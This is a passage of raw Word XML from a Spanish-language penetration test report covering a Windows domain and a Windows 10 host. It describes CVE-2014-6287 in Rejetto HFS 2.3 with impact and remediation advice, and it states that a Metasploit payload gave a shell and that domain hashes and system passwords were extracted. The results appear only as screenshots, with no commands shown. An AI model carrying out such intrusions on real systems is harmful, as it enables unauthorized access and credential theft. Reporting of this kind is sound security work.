      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configurar SSL en todos los servidores web de certificados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E43A97C" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deshabilitar el SMBv1 de todos los controladores de dominio y activar versiones posteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC7375" w14:textId="162F5F67" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF40DDD" w14:textId="11BBA99F" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Se consigue el acceso a todas los hashes del dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE73A1B" w14:textId="63626C65" w:rsidR="00DF2F26" w:rsidRPr="00345A80" w:rsidRDefault="00DF2F26" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E54D36" wp14:editId="64CFE762">
            <wp:extent cx="6190476" cy="4752381"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="100603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2056" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId357">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6190476" cy="4752381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468F00" w14:textId="710B6B43" w:rsidR="003D3AE0" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F0BE2" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396674ED" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677DEA33" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADF3C4F" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C410F7B" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6501F6A5" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A438F5D" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C98F8E" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E30D2E0" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FB9CB9" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628DC78D" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA58EC8" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C177F8D" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDE6F84" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRPr="00CD3845" w:rsidRDefault="000F27CB" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDAE023" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="00083478">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B90839" w14:textId="6A5905E3" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="00083478">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Máquina Windows 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0CF81" w14:textId="23B9E135" w:rsidR="000926EC" w:rsidRDefault="00657AE5" w:rsidP="000926EC">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9DD601" wp14:editId="69E22532">
            <wp:extent cx="6645910" cy="2713355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3122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99402" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId358">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2713355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C855E2E" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encontrando una vulnerabilidad de nivel alto y una de nivel medio además de 43 informativas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CA900" w14:textId="68012C4D" w:rsidR="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">La vulnerabilidad de nivel alto es </w:t>
      </w:r>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidad en el Servidor de archivos </w:t>
      </w:r>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTP Rejetto (HFS) 2.3 (CVE-2014-6287)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC623A" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAFB658" w14:textId="3E4B0249" w:rsidR="00657AE5" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resumen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CFEF19" w14:textId="4C114DD2" w:rsidR="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Este informe técnico aborda la vulnerabilidad identificada en el Servidor de archivos HTTP Rejetto (HFS) versión 2.3, con las referencias CVE-2014-6287. Esta vulnerabilidad permite a un atacante remoto ejecutar código arbitrario en el servidor afectado, lo que podría comprometer la integridad y confidencialidad de los datos alojados en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009244FE" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F29215" w14:textId="12CC2F9B" w:rsidR="000926EC" w:rsidRPr="0056442C" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB1B3B" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>La vulnerabilidad CVE-2014-6287 afecta al Servidor de archivos HTTP Rejetto (HFS) versión 2.3. Esta vulnerabilidad se debe a una falta de validación adecuada de las entradas de usuario en una función específica del software. Como resultado, un atacante remoto puede enviar una solicitud especialmente diseñada al servidor y lograr la ejecución de código arbitrario en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0539F" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58849C2E" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Esta vulnerabilidad permite al atacante aprovechar la función vulnerable para cargar y ejecutar código malicioso en el servidor. El atacante puede aprovechar esta capacidad para tomar el control total del servidor, acceder a los archivos almacenados, manipularlos o eliminarlos, y potencialmente llevar a cabo acciones adicionales en la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72686AFF" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1653C9ED" w14:textId="18ABD30C" w:rsidR="000926EC" w:rsidRPr="0056442C" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Impacto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27765993" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>La explotación exitosa de esta vulnerabilidad puede tener varias consecuencias, entre ellas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02571307" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6181B6FA" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Ejecución de código arbitrario: Un atacante remoto puede cargar y ejecutar código malicioso en el servidor afectado, lo que podría permitir la realización de actividades maliciosas como el robo de datos, el sabotaje de los sistemas o el uso del servidor como plataforma para lanzar ataques adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485580F2" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13409284" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Acceso no autorizado: La ejecución de código arbitrario por parte de un atacante puede permitirle acceder a recursos y datos confidenciales alojados en el servidor. Esto podría conducir al robo de información sensible o comprometer la privacidad de los usuarios y la integridad de los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F419A2F" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550B19F4" w14:textId="640115BD" w:rsidR="000926EC" w:rsidRPr="0056442C" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF8EEB" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Para mitigar los riesgos asociados con esta vulnerabilidad, se recomiendan las siguientes medidas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724A9FB7" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DE2139" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Actualización del software: Actualice el Servidor de archivos HTTP Rejetto (HFS) a una versión posterior que incluya el parche de seguridad correspondiente a la vulnerabilidad CVE-2014-6287. Asegúrese de mantener el software actualizado con los últimos parches y actualizaciones de seguridad disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD575A" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FD1B1E" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Evaluación de sistemas afectados: Identifique los sistemas que ejecutan la versión vulnerable del Servidor de archivos HTTP Rejetto (HFS) y realice una evaluación de riesgos para determinar el impacto potencial en la organización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50063ED1" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA4A794" w14:textId="77777777" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Implementación de defensas en profundidad: Implemente soluciones de seguridad adicionales, como firewalls, sistemas de detección de intrusiones y soluciones antivirus/antimalware actualizadas, para detectar y bloquear actividades maliciosas y proteger el servidor de ataques externos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ADEBD8" w14:textId="77777777" w:rsidR="000B05A7" w:rsidRPr="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA5CF10" w14:textId="42766794" w:rsidR="000B05A7" w:rsidRPr="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B05A7">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E6B4F" w14:textId="4ADCC714" w:rsidR="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Conseguimos ejecutar desde metasploit un paiload que nos permite generar una Shell en el sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B4BDF" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C0D7CE" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4E7A56" w14:textId="77777777" w:rsidR="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15061C6D" w14:textId="6D64F80B" w:rsidR="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B05A7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558CA28D" wp14:editId="0F44CC13">
            <wp:extent cx="6476190" cy="5523809"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="160046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6187" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId359">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6476190" cy="5523809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDE296" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5754EB25" w14:textId="53899D6F" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Además se consigue la extracción de todas las contraseñas del sistema:</w:t>
      </w:r>
    </w:p>
